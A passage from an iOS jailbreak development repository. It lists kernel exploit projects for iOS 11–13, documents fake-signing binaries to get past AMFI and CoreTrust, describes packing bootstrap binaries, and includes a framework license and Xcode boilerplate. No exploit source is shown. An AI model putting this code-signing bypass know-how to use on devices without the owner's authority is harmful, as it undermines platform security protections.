├── .gitignore ├── .gitmodules ├── Documentation ├── CodeSign Tools.md ├── Packing a .TAR file for bianries.md └── readme.md ├── IDA Disassembler Scripts └── Other IDA Scripts ├── Jailbreak Frameworks ├── iOS 11 │ ├── QiLin │ │ ├── .DS_Store │ │ ├── LICENSE.MD │ │ ├── QiLin.h │ │ ├── qilin12.o │ │ └── readme.md │ └── readme.md ├── iOS 12 │ ├── QiLin │ │ ├── LICENSE.MD │ │ ├── QiLin.h │ │ ├── qilin12.o │ │ └── readme.md │ ├── jelbrekLIB │ │ └── readme.md │ └── readme.md └── readme.md ├── Jailbreak Reading Materials ├── literature.md └── readme.md ├── LICENSE ├── README.md ├── Tools ├── iometa │ └── readme.md ├── joker │ ├── joker.tar │ └── readme.md └── jtool2 │ └── jtool2.tgz ├── Tweak Development └── readme.md ├── iOS Device Support └── readme.md └── iOS Exploits Collection ├── iOS 11 ├── readme.md └── tfp0 Kernel Exploits │ ├── async_wake │ ├── .gitignore │ ├── README │ └── async_wake_ios │ │ ├── AppDelegate.h │ │ ├── AppDelegate.m │ │ ├── Assets.xcassets │ │ └── AppIcon.appiconset │ │ │ └── Contents.json │ │ ├── Base.lproj │ │ ├── LaunchScreen.storyboard │ │ └── Main.storyboard │ │ ├── Info.plist │ │ ├── ViewController.h │ │ ├── ViewController.m │ │ ├── arm64_state.h │ │ ├── async_wake.c │ │ ├── async_wake.h │ │ ├── com.apple.iokit.IOMobileGraphicsFamily.plist │ │ ├── early_kalloc.c │ │ ├── early_kalloc.h │ │ ├── find_port.c │ │ ├── find_port.h │ │ ├── kcall.c │ │ ├── kcall.h │ │ ├── kdbg.c │ │ ├── kdbg.h │ │ ├── kmem.c │ │ ├── kmem.h │ │ ├── kutils.c │ │ ├── kutils.h │ │ ├── main.m │ │ ├── symbols.c │ │ └── symbols.h │ └── multi_path │ ├── README.md │ ├── multi_path.xcodeproj │ ├── project.pbxproj │ ├── project.xcworkspace │ │ ├── contents.xcworkspacedata │ │ ├── xcshareddata │ │ │ └── IDEWorkspaceChecks.plist │ │ └── xcuserdata │ │ │ ├── ianbeer.xcuserdatad │ │ │ └── UserInterfaceState.xcuserstate │ │ │ └── jakejames.xcuserdatad │ │ │ └── UserInterfaceState.xcuserstate │ └── xcuserdata │ │ ├── ianbeer.xcuserdatad │ │ └── xcschemes │ │ │ └── 
xcschememanagement.plist │ │ └── jakejames.xcuserdatad │ │ └── xcschemes │ │ └── xcschememanagement.plist │ └── multi_path │ ├── AppDelegate.h │ ├── AppDelegate.m │ ├── Assets.xcassets │ └── AppIcon.appiconset │ │ └── Contents.json │ ├── Base.lproj │ ├── LaunchScreen.storyboard │ └── Main.storyboard │ ├── Info.plist │ ├── ViewController.h │ ├── ViewController.m │ ├── jelbrek │ ├── jelbrek.h │ ├── jelbrek.m │ ├── kern_utils.h │ ├── kern_utils.m │ ├── libjb.h │ ├── libjb.m │ ├── offsetof.c │ ├── offsetof.h │ ├── patchfinder64.h │ └── patchfinder64.m │ ├── kmem.h │ ├── main.m │ ├── multi_path.entitlements │ ├── offsets.h │ ├── offsets.m │ ├── sploit.c │ └── sploit.h ├── iOS 12 ├── readme.md └── tfp0 Kernel Exploits │ ├── readme.md │ └── sock_port │ ├── LICENSE │ ├── Makefile │ ├── README.md │ ├── sock_port.pdf │ ├── sock_port.xcodeproj │ ├── project.pbxproj │ ├── project.xcworkspace │ │ ├── contents.xcworkspacedata │ │ ├── xcshareddata │ │ │ └── IDEWorkspaceChecks.plist │ │ └── xcuserdata │ │ │ ├── jakejames.xcuserdatad │ │ │ └── UserInterfaceState.xcuserstate │ │ │ └── pwn20wnd.xcuserdatad │ │ │ └── UserInterfaceState.xcuserstate │ ├── xcshareddata │ │ └── xcschemes │ │ │ └── sock_port.xcscheme │ └── xcuserdata │ │ ├── jakejames.xcuserdatad │ │ ├── xcdebugger │ │ │ └── Breakpoints_v2.xcbkptlist │ │ └── xcschemes │ │ │ └── xcschememanagement.plist │ │ └── pwn20wnd.xcuserdatad │ │ └── xcschemes │ │ └── xcschememanagement.plist │ ├── sock_port │ ├── AppDelegate.h │ ├── AppDelegate.m │ ├── Assets.xcassets │ │ └── AppIcon.appiconset │ │ │ └── Contents.json │ ├── Base.lproj │ │ ├── LaunchScreen.storyboard │ │ └── Main.storyboard │ ├── Info.plist │ ├── ViewController.h │ ├── ViewController.m │ ├── exploit.c │ ├── exploit.h │ ├── exploit_utilities.c │ ├── exploit_utilities.h │ ├── include │ │ └── IOKit │ │ │ ├── IOKitKeys.h │ │ │ ├── IOKitLib.h │ │ │ ├── IOReturn.h │ │ │ ├── IOTypes.h │ │ │ └── OSMessageNotification.h │ ├── iosurface.c │ ├── iosurface.h │ ├── kernel_memory.c 
│ ├── kernel_memory.h │ ├── main.m │ ├── offsets.h │ └── offsets.m │ ├── sock_port_UITests │ ├── Info.plist │ └── socket_freeUITests.m │ └── sock_port_tests │ ├── Info.plist │ └── socket_freeTests.m └── iOS 13 ├── readme.md └── tfp0 Kernel Exploits ├── readme.md └── time_waste ├── LICENSE ├── README.md ├── time_waste.xcodeproj ├── project.pbxproj ├── project.xcworkspace │ ├── contents.xcworkspacedata │ ├── xcshareddata │ │ └── IDEWorkspaceChecks.plist │ └── xcuserdata │ │ └── jakejames.xcuserdatad │ │ └── UserInterfaceState.xcuserstate └── xcuserdata │ └── jakejames.xcuserdatad │ ├── xcdebugger │ └── Breakpoints_v2.xcbkptlist │ └── xcschemes │ └── xcschememanagement.plist ├── time_waste ├── AppDelegate.h ├── AppDelegate.m ├── Assets.xcassets │ ├── AppIcon.appiconset │ │ └── Contents.json │ └── Contents.json ├── Base.lproj │ ├── LaunchScreen.storyboard │ └── Main.storyboard ├── IOAccelerator_stuff.c ├── IOAccelerator_stuff.h ├── IOKit │ ├── IOKit.tbd │ ├── IOKitKeys.h │ ├── IOKitLib.h │ ├── IOReturn.h │ ├── IOTypes.h │ ├── OSMessageNotification.h │ └── Readme.md ├── IOSurface_stuff.c ├── IOSurface_stuff.h ├── Info.plist ├── ViewController.h ├── ViewController.m ├── exploit.c ├── exploit.h ├── exploit_utilities.c ├── exploit_utilities.h ├── kernel_memory.c ├── kernel_memory.h ├── main.m ├── offsets.h └── offsets.m ├── time_wasteTests ├── Info.plist └── time_wasteTests.m └── time_wasteUITests ├── Info.plist └── time_wasteUITests.m /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "Tools/iometa/iometa"] 2 | path = Tools/iometa/iometa 3 | url = https://github.com/Siguza/iometa 4 | branch = master 5 | [submodule "Jailbreak Frameworks/iOS 12/jelbrekLIB/jelbrekLib"] 6 | path = Jailbreak Frameworks/iOS 
12/jelbrekLIB/jelbrekLib 7 | url = https://github.com/jakeajames/jelbrekLib 8 | branch = master 9 | [submodule "Tweak Development/theos"] 10 | path = Tweak Development/theos 11 | url = https://github.com/theos/theos 12 | branch = master 13 | [submodule "iOS Device Support/iOS-DeviceSupport"] 14 | path = iOS Device Support/iOS-DeviceSupport 15 | url = https://github.com/iGhibli/iOS-DeviceSupport 16 | [submodule "IDA Disassembler Scripts/ida_kernelcache"] 17 | path = IDA Disassembler Scripts/ida_kernelcache 18 | url = https://github.com/bazad/ida_kernelcache 19 | [submodule "IDA Disassembler Scripts/IDA-IOS-Toolkit"] 20 | path = IDA Disassembler Scripts/IDA-IOS-Toolkit 21 | url = https://github.com/stefanesser/IDA-IOS-Toolkit 22 | [submodule "IDA Disassembler Scripts/IDA-Scripts-1"] 23 | path = IDA Disassembler Scripts/IDA-Scripts-1 24 | url = https://github.com/nihilus/IDA-Scripts-1 25 | -------------------------------------------------------------------------------- /Documentation/CodeSign Tools.md: -------------------------------------------------------------------------------- 1 | Starting with iOS 12, Apple introduced CoreTrust, which ensures that the binary you attempt to run (being it a full blown .app file or just a Mach-O binary) has a valid CodeSign blob with a valid ``Apple Developer Relations certificate``. 2 | 3 | Starting with CoreTrust on iOS 12, in order for a binary to not be killed by AMFI (Apple Mobile File Integrity) on the spot with the dreaded "Killed: 9" error, it must: 4 | 5 | * Have a valid CodeSign blob. 6 | * Have a valid certificate embedded in it. 7 | * Have a SHA-256 hash embedded (other variants still produce the crash, some older tools sign with SHA-128, not good). 8 | * Have the right entitlements embedded into it. 9 | * Not violate entitlements policies (AMFI won't just let you slap any entitlement on yourself if you aren't platform!). 
10 | 11 | ## Tools for fake-signing 12 | For properly code-signing the base binaries for the jailbreak I personally use jtool2 created by Jonathan Levin. It does sign properly (SHA-256) (fake signing), but if you use it to sign your binaries, you must add all of them to AMFI's dynamic TrustCache which may or may not be a good idea depending on the scale of your jailbreak. 13 | 14 | * Jtool2 can be found here: http://www.newosxbook.com/tools/jtool.html 15 | 16 | ### Example signing with jtool2, with an entitlements XML file: 17 | `jtool2 --sign --ent Entitlements.xml /Users/geosn0w/Desktop/dropbear` 18 | 19 | ### Checking the signature of a Mach-O binary with jtool2: 20 | `jtool2 --sig --ent /Users/geosn0w/Desktop/dropbear` 21 | 22 | ## Tools for real-signing (as in, signing with certificate and all that) 23 | This has the advantage that you don't necessarily need to add every single binary to AMFI's TrustCache, but you do need a real Apple certificate. A p12 or even your own Apple Developer ID. 24 | 25 | For this I usually use codesign (built-in on macOS). It does allow you to add entitlements from an XML file which is neat, and it allows you to select a signing identity from the Keychain. 26 | 27 | For more info on the usage, run `man codesign` in Terminal. 28 | 29 | ## For questions: 30 | 31 | * GeoSn0w (@FCE365): https://twitter.com/FCE365 32 | * YouTube: iDevice Central: https://www.youtube.com/fce365official 33 | -------------------------------------------------------------------------------- /Documentation/Packing a .TAR file for bianries.md: -------------------------------------------------------------------------------- 1 | When building your jailbreak, you will likely need to deploy the base binaries of the jailbreak to the device when the jailbreak installs. This includes the standard `UNIX` binaries, `SSH` (Dropbear), and other command line tools you may want deployed, like `DPKG` and `APT`. 
2 | 3 | Most if not all jailbreaks use .TAR archives to deploy these. Having a few dozen Mach-O binaries in the root folder of the Xcode project and manually copying them one by one is not a great idea, so tarring them is a good solution. 4 | 5 | ## Common issues when creating a bootstrap or base binaries tar file: 6 | 7 | * You may accidentally include directory (folder) structures. 8 | * You may add .DS_Store files or other annoying ".*" files. 9 | 10 | ## How to properly TAR your binaries (macOS). 11 | 12 | 1) Make a new folder on Desktop, call it basebins, then make another folder inside it and call it `jb`. 13 | 2) Inside the `jb` folder, add all the binaries you want with their proper folders and everything just like you want them to appear on the ROOT FS of the device. Make sure to not overwrite anything (don't make `/var` `/private` `/system` etc. folders yet). 14 | 3) Open Terminal and `cd` into the newly made `basebins` folder. 15 | 4) Run `tar cvf basebins.tar --exclude=".*" ./jb/` 16 | 5) This should create a new .tar file with all the binaries but not with .DS_Store, etc. 17 | 18 | ## For questions: 19 | 20 | * GeoSn0w (@FCE365): https://twitter.com/FCE365 21 | * YouTube: iDevice Central: https://www.youtube.com/fce365official 22 | -------------------------------------------------------------------------------- /Documentation/readme.md: -------------------------------------------------------------------------------- 1 | The files here represent common tools / stuff used for both iOS 13 and iOS 12 and possibly other iOS versions. 
2 | -------------------------------------------------------------------------------- /IDA Disassembler Scripts/Other IDA Scripts: -------------------------------------------------------------------------------- 1 | There are some other iOS IDA scripts but are older: 2 | 3 | * https://github.com/nihilus/IDA-Scripts-1 4 | * https://libraries.io/github/stefanesser/IDA-IOS-Toolkit 5 | -------------------------------------------------------------------------------- /Jailbreak Frameworks/iOS 11/QiLin/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/OpenJailbreak/0acf2c4ea664c3cffb3492fae566838c2ba9abfd/Jailbreak Frameworks/iOS 11/QiLin/.DS_Store -------------------------------------------------------------------------------- /Jailbreak Frameworks/iOS 11/QiLin/LICENSE.MD: -------------------------------------------------------------------------------- 1 | Johnny's (semi) open source license, v0.4 2 | ----------------------------------------- 3 | 4 | This is (well, will be, at the time of writing) open source, and I can't but appeal to your sense of decency. 5 | You might try compile this and try to pass it as your own. Heck, you might even try to run it through llvm-obfuscator. 6 | But that would be stealing code. And obfuscate as you will, you can't obfuscate enough to hide the methods. 7 | So, primum non nocere. Do no harm, and do not steal. 8 | 9 | To be fully clear: 10 | 11 | - Yes, you may use this source or code library as you see fit, PROVIDED THAT: 12 | 13 | - IT IS NOT USED COMMERCIALLY IN ANY WAY. For this, I ask that you contact my company, @Technologeeks, 14 | and ask for proper licensing - they'll also provide official support. 15 | 16 | - IT IS NOT USED AS A COMPONENT OF AN APT IN ANY KIND FORM OR MANNER. 
17 | (NSO/Hackin9/Finfisher/Equus/etc - that means you) 18 | 19 | - WHEN YOU DO USE IT, I ASK THAT YOU MENTION THAT YOUR TOOL IS "powered by the QiLin Toolkit", 20 | or otherwise provide a user facing indication that it is using this code. 21 | I'd appreciate it if you tweeted with #QiLin, too. 22 | 23 | - If you spread lies about other people, propaganda or false claims, while using this toolkit, 24 | then you must renounce your ways, and apologize. Then you can use it freely. 25 | 26 | - There are no limitation on nationality, specific people exclusions (i.e. this is AISE, subject to last condition, above ;-), 27 | or any other race, color or creed - provided the above are met. 28 | 29 | 30 | - QiLin comes with NO LIABILITY WHATSOEVER. YOU USE THIS AT YOUR OWN RISK. 31 | 32 | I CANNOT AND WILL NOT BE HELD ACCOUNTABLE FOR ANY DAMAGE, SOFTWARE OR HARDWARE OR YOUR DATA OR OTHERWISE, 33 | 34 | WHICH MAY OR MAY NOT RESULT TO YOUR IOS DEVICE BY USING THIS. 35 | 36 | - Remember I'm doing this AS A FAVOR. I AM NO IN WAY INDEBTED OR COMMITTED TO SUPPORT THIS, OR ANY OTHER OF MY TOOLS. 37 | You don't have to thank for this (you're welcome) but please don't slander me either. 38 | 39 | - Should you wish to contribute/donate, you may do so in one of the following ways: 40 | 41 | - Monetary: Pick a charity. Any charity. Of your choice. Pay them however money you want. 42 | Optionally, tweet/fb/insta/snap-whatever a screen capture stating "#QiLin". 43 | 44 | - Development: Through http://NewOSXBook.com/forum - you are welcome to ask (proper technical, not lame wen eta) 45 | questions and engage in discussions 46 | 47 | 48 | 49 | First, do no harm. Next, have fun :-) 50 | 51 | Changelog: 52 | 53 | - v0.1 Was AISE but SE is being more of an ass than usual and slandering fake claims directly attacking me. 54 | So this was updated with new condition excluding him until he grows up and behaves like the decent, 55 | talented researcher he can be. 
56 | 57 | - v0.3 adds request to tweet #QiLin. 58 | 59 | - v0.4 states what should be obvious - NO LIABILITY WHATSOEVER 60 | -------------------------------------------------------------------------------- /Jailbreak Frameworks/iOS 11/QiLin/qilin12.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/OpenJailbreak/0acf2c4ea664c3cffb3492fae566838c2ba9abfd/Jailbreak Frameworks/iOS 11/QiLin/qilin12.o -------------------------------------------------------------------------------- /Jailbreak Frameworks/iOS 11/QiLin/readme.md: -------------------------------------------------------------------------------- 1 | This is the first ever plug-and-play Jailbreak Framework. It was developed by Jonathan Levin, the author of the *OS Internals books. 2 | 3 | By his description: 4 | 5 | "All you have to do in order to build on QiLin is to call: int initQiLin (mach_port_t TFP0, uint64_t KernelBase); with the kernel send right (TFP0) and the kernelbase (i.e address of kernel Mach-O + slide). And now you don't even have to do that anymore since QiLin can figure out the slide with just your own task address (which exploits use anyway). The rest is provided by numerous functions." 6 | 7 | -------------------------------------------------------------------------------- /Jailbreak Frameworks/iOS 11/readme.md: -------------------------------------------------------------------------------- 1 | The QiLin toolkit was initially released for iOS 11 by Jonathan Levin, and then ported to iOS 12. Using it on iOS 11 would work, assuming a proper tfp0 exploit for iOS 11 is used. However, the remount technique is different. While you can use QiLin's built-in remount for iOS 11, on iOS 12 with the introduction of APFS snapshots, the remount from QiLin is totally broken (was supposed to get a fix at the time as Jonathan told me, but that never happened unfortunately). 
That was back in 2019; the chances it will ever be fixed are slim, since QiLin is closed source and Jonathan has lost interest in it for now.
this is AISE, subject to last condition, above ;-), 27 | or any other race, color or creed - provided the above are met. 28 | 29 | 30 | - QiLin comes with NO LIABILITY WHATSOEVER. YOU USE THIS AT YOUR OWN RISK. 31 | 32 | I CANNOT AND WILL NOT BE HELD ACCOUNTABLE FOR ANY DAMAGE, SOFTWARE OR HARDWARE OR YOUR DATA OR OTHERWISE, 33 | 34 | WHICH MAY OR MAY NOT RESULT TO YOUR IOS DEVICE BY USING THIS. 35 | 36 | - Remember I'm doing this AS A FAVOR. I AM NO IN WAY INDEBTED OR COMMITTED TO SUPPORT THIS, OR ANY OTHER OF MY TOOLS. 37 | You don't have to thank for this (you're welcome) but please don't slander me either. 38 | 39 | - Should you wish to contribute/donate, you may do so in one of the following ways: 40 | 41 | - Monetary: Pick a charity. Any charity. Of your choice. Pay them however money you want. 42 | Optionally, tweet/fb/insta/snap-whatever a screen capture stating "#QiLin". 43 | 44 | - Development: Through http://NewOSXBook.com/forum - you are welcome to ask (proper technical, not lame wen eta) 45 | questions and engage in discussions 46 | 47 | 48 | 49 | First, do no harm. Next, have fun :-) 50 | 51 | Changelog: 52 | 53 | - v0.1 Was AISE but SE is being more of an ass than usual and slandering fake claims directly attacking me. 54 | So this was updated with new condition excluding him until he grows up and behaves like the decent, 55 | talented researcher he can be. 56 | 57 | - v0.3 adds request to tweet #QiLin. 
58 | 59 | - v0.4 states what should be obvious - NO LIABILITY WHATSOEVER 60 | -------------------------------------------------------------------------------- /Jailbreak Frameworks/iOS 12/QiLin/qilin12.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/OpenJailbreak/0acf2c4ea664c3cffb3492fae566838c2ba9abfd/Jailbreak Frameworks/iOS 12/QiLin/qilin12.o -------------------------------------------------------------------------------- /Jailbreak Frameworks/iOS 12/QiLin/readme.md: -------------------------------------------------------------------------------- 1 | This is the first ever plug-and-play Jailbreak Framework. It was developed by Jonathan Levin, the author of the *OS Internals books. 2 | 3 | By his description: 4 | 5 | "All you have to do in order to build on QiLin is to call: int initQiLin (mach_port_t TFP0, uint64_t KernelBase); with the kernel send right (TFP0) and the kernelbase (i.e address of kernel Mach-O + slide). And now you don't even have to do that anymore since QiLin can figure out the slide with just your own task address (which exploits use anyway). The rest is provided by numerous functions." 6 | 7 | -------------------------------------------------------------------------------- /Jailbreak Frameworks/iOS 12/jelbrekLIB/readme.md: -------------------------------------------------------------------------------- 1 | This is jelbrekLIB - while it is currently discontinued, it should hold for an iOS 12.0 to maybe iOS 12.4? Jailbreak. (Offsets may need tweaking) 2 | -------------------------------------------------------------------------------- /Jailbreak Frameworks/iOS 12/readme.md: -------------------------------------------------------------------------------- 1 | For iOS 12 up to 12.4-ish? Maybe even more, you can use two frameworks, one at a time. One of them (JelbrekLIB) is open source, while the other is not (QiLin). 
They both work well, but QiLin being closed-source and largely abandoned, tends to be a pain to fix if there is a bug. 2 | -------------------------------------------------------------------------------- /Jailbreak Frameworks/readme.md: -------------------------------------------------------------------------------- 1 | These are pre-made jailbreak frameworks used to create quick jailbreak tools. They tend to have most code built-in, only requiring a tfp0 exploit to be plugged in and the kernel task port (task_port_t variable) to be passed to it at initialization. Refer to the individual documentation for details on how to use them. 2 | -------------------------------------------------------------------------------- /Jailbreak Reading Materials/literature.md: -------------------------------------------------------------------------------- 1 | ### Currently available literature in the repo 2 | 3 | * GeoSn0w's blog: https://geosn0w.github.io 4 | * Siguza's Blog: https://siguza.github.io 5 | * Google Project Zero Blog (very good exploit write-ups): https://googleprojectzero.blogspot.com 6 | * Apple Developer Portal: https://developer.apple.com 7 | * The NewOSXBooks Forum: http://newosxbook.com/forum/index.php 8 | * ZecOPS' Vulnerabilities Blog (Great write-ups): https://blog.zecops.com/vulnerabilities 9 | * Siguza's iOS Resources (plenty of good stuff): https://github.com/Siguza/ios-resources 10 | * Pangu's BlackBird SEP Exploit and Presentation: https://t.co/rk6Jnzfyuj?amp=1 11 | 12 | ### SEP (Secure Enclave Processor) 13 | 14 | * Demystifying the Secure Enclave Processor (2016): https://www.blackhat.com/docs/us-16/materials/us-16-Mandt-Demystifying-The-Secure-Enclave-Processor.pdf 15 | 16 | ### Jailbreak walkthroughs: 17 | 18 | * How was rootlessJB (iOS 11 - 11.3.1) built: https://github.com/jakeajames/rootlessJB/blob/master/writeup.pdf 19 | 20 | MORE TO COME 21 | -------------------------------------------------------------------------------- /Jailbreak Reading 
Materials/readme.md: -------------------------------------------------------------------------------- 1 | This section contains blogs, pdfs, repos with literature, books, documentation, etc. 2 | Everything that can help you understand various jailbreak processes. May also include videos (from BlackHat, etc.) if they explain certain aspects very well. 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OpenJailbreak 2 | GeoSn0w's OpenJailbreak Project, an open-source iOS 11 to iOS 16 Jailbreak project with documentation of the steps involved, all the tools used, exploits and more. 3 | 4 | See this is as a Jailbreak Development Vault. 5 | 6 | ## To clone this repo properly: 7 | ``` 8 | git clone --recursive https://github.com/GeoSn0w/OpenJailbreak.git 9 | ``` 10 | 11 | ## This is the beginning of something truly amazing. Stay tuned! 12 | 13 | ## Find me on Social Media 14 | 15 | * Twitter: @FCE365 16 | * YouTube Channel: iDevice Central (Formerly F.C.E. 365 TV - iDevice Central) 17 | 18 | ### My Websites 19 | * Latest iOS 16 Jailbreak News 20 | * Latest Gaming News & Guides 21 | * iOS Jailbreak Forum 22 | * Latest FRP Bypass Tools & Guides 23 | -------------------------------------------------------------------------------- /Tools/iometa/readme.md: -------------------------------------------------------------------------------- 1 | Extracts C++ class runtime information from an arm64 iOS kernel. 2 | Class names, inheritance, vtables, methods, etc. 
3 | -------------------------------------------------------------------------------- /Tools/joker/joker.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/OpenJailbreak/0acf2c4ea664c3cffb3492fae566838c2ba9abfd/Tools/joker/joker.tar -------------------------------------------------------------------------------- /Tools/joker/readme.md: -------------------------------------------------------------------------------- 1 | Deprecated! The functionality of joker is now built-in to Jtool2 when used with --analyze on any kernelcache 2 | 3 | This is basically used to analyze iOS Kernels. It aids in iOS / macOS Kernel Reverse Engineering, but it is legacy software. Most of its functionality is now part of jtool2. Just in case you need it, however, it is here. 4 | 5 | ### Documentation 6 | 7 | Official documentation and how to use it: http://www.newosxbook.com/tools/joker.html 8 | -------------------------------------------------------------------------------- /Tools/jtool2/jtool2.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/OpenJailbreak/0acf2c4ea664c3cffb3492fae566838c2ba9abfd/Tools/jtool2/jtool2.tgz -------------------------------------------------------------------------------- /Tweak Development/readme.md: -------------------------------------------------------------------------------- 1 | This section contains Jailbreak Tweaks Development tools. 2 | 3 | ### Index 4 | 5 | * Theos - This is used to compile the tweaks on both iOS and macOS. Can be used to built the actual tweaks in an usable format. 6 | Please refer to the documentation. 
7 | -------------------------------------------------------------------------------- /iOS Device Support/readme.md: -------------------------------------------------------------------------------- 1 | ### Legacy Xcode Support Files 2 | 3 | This is a collection of Xcode iOS Support files which allow you to use an older Xcode version* to test your jailbreak tool even if you use an older macOS. 4 | For example, I use macOS High Sierra on an iMac 2011, running Xcode 10.1 as the latest supported version. This is OLD. Naturally it wouldn't support my iOS 13 devices, let alone my iOS 14 Beta ones. Adding the support files allows me to write code for much newer iOS than the default supported by my Xcode. 5 | 6 | This is rather useful if you're doing iOS development on a budget and you cannot afford a newer Mac or Macbook to have the latest Xcode. 7 | 8 | * In some cases iOS support files are not enough and you may also need a new SDK from a newer Xcode to support newer CPUs (i.e. A12 and A13). 9 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/readme.md: -------------------------------------------------------------------------------- 1 | This folder contains the tfp0 kernel exploit(s) used for iOS 11 jailbreak purposes. 
2 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/.gitignore: -------------------------------------------------------------------------------- 1 | # Created by https://www.gitignore.io/api/macos,xcode 2 | 3 | ### macOS ### 4 | *.DS_Store 5 | .AppleDouble 6 | .LSOverride 7 | 8 | # Icon must end with two \r 9 | Icon 10 | 11 | # Thumbnails 12 | ._* 13 | 14 | # Files that might appear in the root of a volume 15 | .DocumentRevisions-V100 16 | .fseventsd 17 | .Spotlight-V100 18 | .TemporaryItems 19 | .Trashes 20 | .VolumeIcon.icns 21 | .com.apple.timemachine.donotpresent 22 | 23 | # Directories potentially created on remote AFP share 24 | .AppleDB 25 | .AppleDesktop 26 | Network Trash Folder 27 | Temporary Items 28 | .apdisk 29 | 30 | ### Xcode ### 31 | # Xcode 32 | # 33 | # gitignore contributors: remember to update Global/Xcode.gitignore, Objective-C.gitignore & Swift.gitignore 34 | 35 | ## Build generated 36 | build/ 37 | DerivedData/ 38 | 39 | ## Various settings 40 | *.pbxuser 41 | !default.pbxuser 42 | *.mode1v3 43 | !default.mode1v3 44 | *.mode2v3 45 | !default.mode2v3 46 | *.perspectivev3 47 | !default.perspectivev3 48 | xcuserdata/ 49 | 50 | ## Other 51 | *.moved-aside 52 | *.xccheckout 53 | *.xcscmblueprint 54 | 55 | ### Xcode Patch ### 56 | *.xcodeproj/* 57 | !*.xcodeproj/project.pbxproj 58 | !*.xcodeproj/xcshareddata/ 59 | !*.xcworkspace/contents.xcworkspacedata 60 | /*.gcno 61 | 62 | # End of https://www.gitignore.io/api/macos,xcode 63 | 64 | async_wake_ios.xcodeproj/project.pbxproj 65 | async_wake_ios.xcodeproj/project.pbxproj 66 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/AppDelegate.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | @interface AppDelegate : UIResponder 4 | 5 | @property 
(strong, nonatomic) UIWindow *window; 6 | 7 | 8 | @end 9 | 10 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/AppDelegate.m: -------------------------------------------------------------------------------- 1 | #import "AppDelegate.h" 2 | #include "async_wake.h" 3 | 4 | @interface AppDelegate () 5 | 6 | @end 7 | 8 | @implementation AppDelegate 9 | 10 | 11 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 12 | // Override point for customization after application launch. 13 | //go(); 14 | return YES; 15 | } 16 | 17 | 18 | - (void)applicationWillResignActive:(UIApplication *)application { 19 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 20 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 21 | } 22 | 23 | 24 | - (void)applicationDidEnterBackground:(UIApplication *)application { 25 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 26 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 27 | } 28 | 29 | 30 | - (void)applicationWillEnterForeground:(UIApplication *)application { 31 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 
32 | } 33 | 34 | 35 | - (void)applicationDidBecomeActive:(UIApplication *)application { 36 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 37 | } 38 | 39 | 40 | - (void)applicationWillTerminate:(UIApplication *)application { 41 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 42 | } 43 | 44 | 45 | @end 46 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 11/tfp0 Kernel Exploits/async_wake/async_wake_ios/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "20x20", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "20x20", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "29x29", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "29x29", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "40x40", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "40x40", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "idiom" : "iphone", 35 | "size" : "60x60", 36 | "scale" : "2x" 37 | }, 38 | { 39 | "idiom" : "iphone", 40 | "size" : "60x60", 41 | "scale" : "3x" 42 | }, 43 | { 44 | "idiom" : "ipad", 45 | "size" : "20x20", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "ipad", 50 | "size" : "20x20", 51 | "scale" : "2x" 52 | }, 53 | { 54 | "idiom" : "ipad", 55 | "size" : "29x29", 56 | "scale" : "1x" 57 | }, 58 | { 59 | "idiom" : "ipad", 60 | "size" : "29x29", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "idiom" : "ipad", 65 | "size" : "40x40", 66 | "scale" : "1x" 67 | }, 68 | { 69 | "idiom" : "ipad", 70 | "size" : "40x40", 71 | "scale" : "2x" 72 | }, 73 | { 74 | 
